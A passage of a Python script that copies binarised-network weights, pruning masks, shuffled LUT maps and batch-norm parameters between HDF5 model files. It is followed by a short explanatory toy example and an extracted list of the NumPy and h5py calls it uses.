np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] 
= c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 4 bl_w1 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_3"]["residual_sign_3"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_16:0"] 
pret_c17= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_26:0"] pret_c27= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_4"]["binary_dense_4"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = 
np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] = c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] 
= rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # dense layer 5 bl_w1 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"] bl_rand_map_0 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"] bl_pruning_mask = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"] bl_gamma = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"] bl_means = bl["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"] pret_rand_map_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"] pret_rand_map_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_1:0"] pret_rand_map_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_2:0"] pret_pruning_mask = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"] p_gamma = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"] pret_means = pretrained["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"] pret_c1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"] pret_c2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_2:0"] pret_c3 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_3:0"] pret_c4 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_4:0"] pret_c5 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_5:0"] pret_c6 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_6:0"] pret_c7 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_7:0"] pret_c8 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_8:0"] pret_c9 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_9:0"] pret_c10= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_10:0"] pret_c11= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_11:0"] pret_c12= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_12:0"] pret_c13= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_13:0"] pret_c14= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_14:0"] pret_c15= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_15:0"] pret_c16= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_16:0"] pret_c17= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_17:0"] pret_c18= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_18:0"] pret_c19= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_19:0"] pret_c20= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_20:0"] pret_c21= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_21:0"] pret_c22= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_22:0"] pret_c23= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_23:0"] pret_c24= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_24:0"] pret_c25= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_25:0"] pret_c26= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_26:0"] pret_c27= 
pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_27:0"] pret_c28= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_28:0"] pret_c29= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_29:0"] pret_c30= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_30:0"] pret_c31= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_31:0"] pret_c32= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_32:0"] pret_w1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_33:0"] pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_0:0"] pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_1:0"] pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_2:0"] weight_shape = np.shape(bl_w1) tile_shape = np.shape(pret_c1) zero_fill = np.zeros(tile_shape) one_fill = np.ones(tile_shape) neg_one_fill = -np.ones(tile_shape) # randomisation and pruning recovery bl_w1_unroll = np.array(bl_w1) bl_w1 = np.array(bl_w1) rand_map_0 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_0) rand_map_1 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_1) rand_map_2 = np.arange(tile_shape[0]) np.random.shuffle(rand_map_2) pruning_mask = np.array(bl_pruning_mask).astype(bool) init_mask = np.logical_not(pruning_mask[rand_map_0]) pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)] pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover) init_mask = np.reshape(init_mask, tile_shape) # expand randomisation map across tiles rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]]) rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]]) rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]]) for i in range(weight_shape[0]): rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0]) bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand] bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape) w1 = bl_w1 # connect1 only c1 = one_fill c2 = neg_one_fill c3 = one_fill c4 = neg_one_fill c5 = one_fill c6 = neg_one_fill c7 = one_fill c8 = neg_one_fill c9 = one_fill c10 = neg_one_fill c11 = one_fill c12 = neg_one_fill c13 = one_fill c14 = neg_one_fill c15 = one_fill c16 = neg_one_fill c17 = neg_one_fill c18 = one_fill c19 = neg_one_fill c20 = one_fill c21 = neg_one_fill c22 = one_fill c23 = neg_one_fill c24 = one_fill c25 = neg_one_fill c26 = one_fill c27 = neg_one_fill c28 = one_fill c29 = neg_one_fill c30 = one_fill c31 = neg_one_fill c32 = one_fill pret_w1 [...] = w1 pret_c1 [...] = c1 pret_c2 [...] = c2 pret_c3 [...] = c3 pret_c4 [...] = c4 pret_c5 [...] = c5 pret_c6 [...] = c6 pret_c7 [...] = c7 pret_c8 [...] = c8 pret_c9 [...] = c9 pret_c10[...] = c10 pret_c11[...] = c11 pret_c12[...] = c12 pret_c13[...] = c13 pret_c14[...] = c14 pret_c15[...] = c15 pret_c16[...] 
= c16 pret_c17[...] = c17 pret_c18[...] = c18 pret_c19[...] = c19 pret_c20[...] = c20 pret_c21[...] = c21 pret_c22[...] = c22 pret_c23[...] = c23 pret_c24[...] = c24 pret_c25[...] = c25 pret_c26[...] = c26 pret_c27[...] = c27 pret_c28[...] = c28 pret_c29[...] = c29 pret_c30[...] = c30 pret_c31[...] = c31 pret_c32[...] = c32 pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float) pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float) pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float) p_gamma[...] = np.array(bl_gamma) pret_means[...] = np.array(bl_means) pret_pruning_mask[...] = np.array(bl_pruning_mask) rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float) pret_rand_map_exp_0[...] = rand_map_0_expand rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float) pret_rand_map_exp_1[...] = rand_map_1_expand rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float) pret_rand_map_exp_2[...] = rand_map_2_expand print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask)))) # bn 1 bl_beta = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 2 bl_beta = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] 
= np.array(bl_moving_variance) # bn 3 bl_beta = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 4 bl_beta = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 5 bl_beta = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) pretrained.close()
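The weight-copying script above repeats the same block for each binary dense layer; the one step that is not a straight copy is the pruning-mask "recovery" around the shuffled LUT input map (logical_not / logical_and / argsort / logical_or). The toy below isolates that step on a 1-D mask of length n, ignoring the tiling across the full weight matrix; the variable names are ours. (Note that the script itself relies on Python 2-era behaviour: np.set_printoptions(threshold=np.nan) and the integer '/' divisions inside np.tile and the index arithmetic would need int(...) casts or '//' under Python 3 and current NumPy.)

import numpy as np

rng = np.random.default_rng(0)
n = 8
pruning_mask = rng.random(n) < 0.5          # True = weight kept, False = pruned
rand_map = rng.permutation(n)                 # shuffled partner index, as in rand_map_0

# A pruned position j gets "recovered" (re-enabled) when a kept position k is shuffled onto it.
init_mask = np.logical_not(pruning_mask[rand_map])
recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map)]
merged = np.logical_or(pruning_mask, recover)

print(pruning_mask.astype(int))
print(merged.astype(int))    # keeps every originally-kept weight, may re-enable pruned ones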
[ "numpy.tile", "numpy.random.shuffle", "numpy.reshape", "numpy.ones", "numpy.logical_and", "numpy.logical_not", "numpy.logical_or", "h5py.File", "numpy.argsort", "numpy.array", "shutil.copyfile", "numpy.zeros", "numpy.shape", "numpy.arange", "numpy.set_printoptions" ]
[((31, 68), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'np.nan'}), '(threshold=np.nan)\n', (50, 68), True, 'import numpy as np\n'), ((99, 147), 'shutil.copyfile', 'copyfile', (['"""dummy_lutnet.h5"""', '"""pretrained_bin.h5"""'], {}), "('dummy_lutnet.h5', 'pretrained_bin.h5')\n", (107, 147), False, 'from shutil import copyfile\n'), ((211, 247), 'h5py.File', 'h5py.File', (['"""baseline_pruned.h5"""', '"""r"""'], {}), "('baseline_pruned.h5', 'r')\n", (220, 247), False, 'import h5py\n'), ((297, 333), 'h5py.File', 'h5py.File', (['"""pretrained_bin.h5"""', '"""r+"""'], {}), "('pretrained_bin.h5', 'r+')\n", (306, 333), False, 'import h5py\n'), ((949, 964), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (957, 964), True, 'import numpy as np\n'), ((980, 998), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (988, 998), True, 'import numpy as np\n'), ((1024, 1049), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1032, 1049), True, 'import numpy as np\n'), ((5514, 5529), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (5522, 5529), True, 'import numpy as np\n'), ((5543, 5560), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (5551, 5560), True, 'import numpy as np\n'), ((5573, 5593), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (5581, 5593), True, 'import numpy as np\n'), ((5605, 5624), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (5612, 5624), True, 'import numpy as np\n'), ((5714, 5729), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (5722, 5729), True, 'import numpy as np\n'), ((5738, 5753), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (5746, 5753), True, 'import numpy as np\n'), ((5768, 5792), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5777, 5792), True, 'import numpy as np\n'), ((5793, 5822), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (5810, 5822), True, 'import numpy as np\n'), ((5836, 5860), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5845, 5860), True, 'import numpy as np\n'), ((5861, 5890), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (5878, 5890), True, 'import numpy as np\n'), ((5904, 5928), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5913, 5928), True, 'import numpy as np\n'), ((5929, 5958), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (5946, 5958), True, 'import numpy as np\n'), ((6026, 6066), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (6040, 6066), 